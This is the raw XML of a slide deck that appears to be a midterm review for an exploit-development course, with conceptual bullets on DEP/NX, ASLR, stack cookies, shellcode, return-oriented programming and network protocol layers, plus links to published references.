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8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8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2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId39"/><Relationship Target="slides/slide31.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId38"/><Relationship Target="slides/slide30.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId37"/><Relationship Target="slides/slide29.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId36"/><Relationship Target="slides/slide23.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId30"/><Relationship Target="slides/slide24.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId31"/><Relationship Target="slides/slide64.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId71"/><Relationship Target="slides/slide27.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId34"/><Relationship Target="slides/slide63.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId70"/><Relationship Target="slides/slide28.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId35"/><Relationship Target="slides/slide25.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId32"/><Relationship Target="slides/slide26.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId33"/><Relationship Target="slides/slide68.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId75"/><Relationship Target="slides/slide67.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId74"/><Relationship Target="slides/slide66.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId73"/><Relationship Target="slides/slide65.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId72"/><Relationship Target="slides/slide72.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId79"/><Relationship Target="slides/slide71.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId78"/><Relationship Target="slides/slide70.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId77"/><Relationship Target="slides/slide69.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId76"/><Relationship Target="slides/slide41.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId48"/><Relationship Target="slides/slide40.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId47"/><Relationship Target="slides/slide42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3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4.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId41"/><Relationship Target="tableStyles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Id="rId3"/><Relationship Target="slides/slide35.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId42"/><Relationship Target="slides/slide73.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId80"/><Relationship Target="slides/slide36.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId43"/><Relationship Target="slides/slide37.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId44"/><Relationship Target="slides/slide75.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId82"/><Relationship Target="slides/slide38.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId45"/><Relationship Target="slides/slide74.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId81"/><Relationship Target="slides/slide39.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId46"/><Relationship Target="slides/slide77.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId84"/><Relationship Target="slides/slide76.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId83"/><Relationship Target="slides/slide2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId9"/><Relationship Target="slides/slide79.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId86"/><Relationship Target="slides/slide78.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId85"/><Relationship Target="slides/slide81.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId88"/><Relationship Target="slideMasters/slideMaster3.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Id="rId6"/><Relationship Target="slides/slide80.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId87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8"/><Relationship Target="slides/slide82.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId89"/><Relationship Target="notesMasters/notesMaster1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Id="rId7"/><Relationship Target="slides/slide87.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId94"/><Relationship Target="slides/slide51.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId58"/><Relationship Target="slides/slide52.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId59"/><Relationship Target="slides/slide83.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId90"/><Relationship Target="slides/slide84.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId91"/><Relationship Target="slides/slide85.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId92"/><Relationship Target="slides/slide12.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId19"/><Relationship Target="slides/slide86.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId93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0.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId57"/><Relationship Target="slides/slide49.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId56"/><Relationship Target="slides/slide48.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId55"/><Relationship Target="slides/slide47.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId54"/><Relationship Target="slides/slide46.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId53"/><Relationship Target="slides/slide45.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId52"/><Relationship Target="slides/slide44.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId51"/><Relationship Target="slides/slide43.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId50"/><Relationship Target="slides/slide62.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId69"/><Relationship Target="slides/slide22.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId29"/><Relationship Target="slides/slide19.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId26"/><Relationship Target="slides/slide18.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId25"/><Relationship Target="slides/slide21.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId28"/><Relationship Target="slides/slide20.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId27"/><Relationship Target="slides/slide14.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId21"/><Relationship Target="slides/slide15.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId22"/><Relationship Target="slides/slide53.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId60"/><Relationship Target="slides/slide16.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId23"/><Relationship Target="slides/slide17.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId24"/><Relationship Target="slides/slide13.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId20"/><Relationship Target="slides/slide59.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId66"/><Relationship Target="slides/slide58.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId65"/><Relationship Target="slides/slide61.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId68"/><Relationship Target="slides/slide60.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId67"/><Relationship Target="slides/slide55.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId62"/><Relationship Target="slides/slide54.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId61"/><Relationship Target="slides/slide57.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId64"/><Relationship Target="slides/slide56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y="685800" x="1143212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9" name="Shape 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0" name="Shape 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3" name="Shape 6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5" name="Shape 6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1" name="Shape 6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0" name="Shape 6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7" name="Shape 6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4" name="Shape 6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1" name="Shape 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1" name="Shape 6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8" name="Shape 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2" name="Shape 6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1" name="Shape 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9" name="Shape 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7" name="Shape 7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6" name="Shape 7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2" name="Shape 7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8" name="Shape 7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9" name="Shape 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0" name="Shape 7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8" name="Shape 7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4" name="Shape 7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6" name="Shape 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2" name="Shape 7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9" name="Shape 7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5" name="Shape 8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1" name="Shape 8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7" name="Shape 8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3" name="Shape 8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9" name="Shape 8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0" name="Shape 8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5" name="Shape 8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1" name="Shape 8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2" name="Shape 8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9" name="Shape 8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0" name="Shape 8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5" name="Shape 8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1" name="Shape 8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2" name="Shape 8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8" name="Shape 8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4" name="Shape 8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0" name="Shape 8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6" name="Shape 8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2" name="Shape 8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8" name="Shape 8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4" name="Shape 9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0" name="Shape 9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77" name="Shape 177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178" name="Shape 178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42" name="Shape 242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243" name="Shape 243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Shape 245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48" name="Shape 248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249" name="Shape 249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Shape 25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 sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="18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 sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="18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256" name="Shape 25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257" name="Shape 25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Shape 25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61" name="Shape 261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262" name="Shape 262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Shape 26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 sz="4800"/>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl3pPr>
            <a:lvl4pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl4pPr>
            <a:lvl5pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl5pPr>
            <a:lvl6pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl6pPr>
            <a:lvl7pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl7pPr>
            <a:lvl8pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl8pPr>
            <a:lvl9pPr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2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt2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2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt2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2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt2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58" name="Shape 158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159" name="Shape 159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Shape 161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64" name="Shape 16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165" name="Shape 16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 sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="18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 sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/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172" name="Shape 172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173" name="Shape 173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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../slideLayouts/slideLayout14.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout13.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../slideLayouts/slideLayout16.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId4"/><Relationship Target="../slideLayouts/slideLayout15.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId3"/><Relationship Target="../slideLayouts/slideLayout18.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId6"/><Relationship Target="../slideLayouts/slideLayout17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04" name="Shape 104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105" name="Shape 105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6" name="Shape 106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6" name="Shape 116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8" name="Shape 118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9" name="Shape 119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0" name="Shape 120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2" name="Shape 122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3" name="Shape 123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4" name="Shape 124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7" name="Shape 127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8" name="Shape 128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2" name="Shape 132"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="245542" x="0"/>
            <a:ext cy="1500" cx="32510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3" name="Shape 133"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="1407880" x="-1212177"/>
            <a:ext cy="1500" cx="28062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y="474143" x="0"/>
            <a:ext cy="1500" cx="26669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5" name="Shape 135"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="702743" x="0"/>
            <a:ext cy="1500" cx="21675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6" name="Shape 136"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="931342" x="0"/>
            <a:ext cy="1500" cx="18626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y="1159942" x="0"/>
            <a:ext cy="1500" cx="14900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8" name="Shape 138"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1388542" x="0"/>
            <a:ext cy="1500" cx="12191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9" name="Shape 139"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1617142" x="0"/>
            <a:ext cy="1500" cx="9905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0" name="Shape 140"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1845742" x="0"/>
            <a:ext cy="1500" cx="7452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y="2074342" x="0"/>
            <a:ext cy="1500" cx="5333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2" name="Shape 142"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2302943" x="0"/>
            <a:ext cy="1500" cx="2624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3" name="Shape 143"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="1238115" x="-814261"/>
            <a:ext cy="1500" cx="24683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4" name="Shape 144"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="1014527" x="-357712"/>
            <a:ext cy="1500" cx="20180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5" name="Shape 145"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="887576" x="-853"/>
            <a:ext cy="1500" cx="17639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6" name="Shape 146"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="790194" x="326307"/>
            <a:ext cy="1500" cx="15693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7" name="Shape 147"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="709726" x="636516"/>
            <a:ext cy="1500" cx="14085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8" name="Shape 148"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="603961" x="972228"/>
            <a:ext cy="1500" cx="11967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49" name="Shape 149"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="527761" x="1278236"/>
            <a:ext cy="1500" cx="10443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0" name="Shape 150"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="440776" x="1590398"/>
            <a:ext cy="1500" cx="8795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1" name="Shape 151"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="377227" x="1883657"/>
            <a:ext cy="1500" cx="7527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2" name="Shape 152"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="292493" x="2198066"/>
            <a:ext cy="1500" cx="5834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3" name="Shape 153"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="199376" x="2521027"/>
            <a:ext cy="1500" cx="3972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4" name="Shape 154"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="148627" x="2801688"/>
            <a:ext cy="1500" cx="2954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5" name="Shape 155"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="102444" x="3079242"/>
            <a:ext cy="1500" cx="201599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6" name="Shape 156"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="85076" x="3324762"/>
            <a:ext cy="1500" cx="168600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:srgbClr val="B7CCE4">
                <a:alpha val="5373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7" name="Shape 187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188" name="Shape 188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9" name="Shape 199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0" name="Shape 200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1" name="Shape 201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2" name="Shape 202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3" name="Shape 203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4" name="Shape 204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5" name="Shape 205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6" name="Shape 206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7" name="Shape 207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8" name="Shape 208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9" name="Shape 209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0" name="Shape 210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1" name="Shape 211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2" name="Shape 212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213" name="Shape 2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5" name="Shape 215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216" name="Shape 21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7" name="Shape 21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7" name="Shape 22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8" name="Shape 22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9" name="Shape 22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0" name="Shape 23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1" name="Shape 23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2" name="Shape 23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3" name="Shape 23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4" name="Shape 23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5" name="Shape 23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6" name="Shape 23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7" name="Shape 23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8" name="Shape 23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9" name="Shape 23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0" name="Shape 24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railofbits.com/resources/the_future_of_exploitation_slides.pdf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="../media/image04.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/><Relationship Target="http://www.trailofbits.com/resources/the_future_of_exploitation_slides.pdf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId6"/><Relationship Target="http://www.trailofbits.com/resources/the_future_of_exploitation_slides.pdf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first.org/cvss/faq" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="http://www.first.org/cvss#" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External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log.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="../media/image08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railofbits.com/resources/the_future_of_exploitation_slides.pdf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="../media/image06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uninformed.org/?v=2&amp;a=4&amp;t=txt" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3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pakt/ropc" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="http://cseweb.ucsd.edu/~hovav/dist/geometry.pdf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/><Relationship Target="http://www.ieee-security.org/TC/SP2012/papers/4681a571.pdf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId6"/><Relationship Target="http://users.ece.cmu.edu/~ejschwar/bib/schwartz_2011_rop-abstract.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId5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lip.tv/source-boston-2010/dino-dai-zovi-practical-return-oriented-programming-3583429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="http://www.immunitysec.com/downloads/DEPLIB.pdf)" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/><Relationship Target="http://blip.tv/source-boston-2010/dino-dai-zovi-practical-return-oriented-programming-3583429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId5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community.rapid7.com/community/metasploit/blog/2012/10/03/defeat-the-hard-and-strong-with-the-soft-and-gentle-metasploit-ropdb" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="https://www.corelan.be/index.php/security/corelan-ropdb/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3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railofbits.com/resources/the_future_of_exploitation_slides.pdf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="../media/image06.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image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lip.tv/source-boston-2010/dino-dai-zovi-practical-return-oriented-programming-3583429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="http://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/><Relationship Target="http://fumalwareanalysis.blogspot.com/2012/02/malware-analysis-tutorial-16-return.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId6"/><Relationship Target="https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId5"/><Relationship Target="https://www.corelan.be/index.php/security/corelan-ropdb/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId7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dtr.wordpress.com/2013/12/13/ropc-turing-complete-rop-compiler-part-1/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86.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide86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87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide87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Midterm #2 Review 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Exploit Development 105</a:t>
            </a:r>
          </a:p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Spring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Windows Security Evolution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6800" x="795337"/>
            <a:ext cy="5705475" cx="75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y="965400" x="794075"/>
            <a:ext cy="546599" cx="29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000" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Source:</a:t>
            </a:r>
            <a:br>
              <a:rPr u="sng" sz="1000" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr u="sng" sz="1000" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.trailofbits.com/resources/the_future_of_exploitation_slides.pdf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Executable Security Mechanisms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Detect memory corruption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GS stack cookies (checked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  <a:r>
              <a:rPr lang="en"/>
              <a:t>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Heap corruption detection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Defeat common exploit patterns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GS variable reordering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DEP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ASLR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…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 Mitigations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9749" x="1047750"/>
            <a:ext cy="5238750" cx="79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>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1480349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Even though your hardware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and OS may offer these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mitigations...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they may be OFF for your application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(things have to OPT in)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 Mitigations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9749" x="1047750"/>
            <a:ext cy="5238750" cx="79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>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1480349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Jailbroken phones, usually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disable all support for these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9000% easier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A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to attack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Executable Security Mechanisms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Know what DEP/NX is and how it mitigates certain attacks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Know what ASLR is and how it mitigates certain attacks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DEP/NX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application or .dll must be compiled with the /NXCOMPAT flag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otherwise no DEP/NX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NX BIT support can be absent in jailbroken phones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ALSR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partial ASLR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base locations for certain things are randomized each time the process is initialized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some things will still be static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full ASLR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base location for every segment is randomized each time the process is inititalized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Stack Cookies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cookie value is usually stored somewhere in the .data segment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if you can debug the program, you can read the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Can brute force remotely sometimes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know the basics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know the restrictions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nullbytes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 know how system calls are made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EAX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int 0x80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 development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Know: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Return to library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return chaining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later this lecture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ROP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later this lecture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Review of Exploit Development Concepts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shellcode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exploitation techniques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executable security mitigations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DEP/NX, ASLR, etc..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Review of Network Hacking concepts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Review of Web Application Hacking concepts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Review of Big picture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attack chains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What to expect on the Midterm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Exploit Development 105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60000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RETURN-ORIENTED PROGRAMMING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53692" x="7191378"/>
            <a:ext cy="2027745" cx="172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Internet protocol suite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1969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Application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DHCP DHCPv6 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>IMAP IRC LDAP MGCP NNTP BGP NTP POP RPC RTP RTSP RIP SIP SMTP SNMP SOCKS SSH Telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>TLS/SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t> XMPP (more)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Transport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TCP UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>DCCP SCTP RSVP (more)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Internet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IP IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t> IPv6  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>ICMPv6 ECN IGMP IPsec (more)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Link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ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>/InARP NDP OSPF Tunnels L2TP PPP Media access control Ethernet DSL ISDN FDDI  (more)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 the basics of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Application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DNS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HTTP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TLS/SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
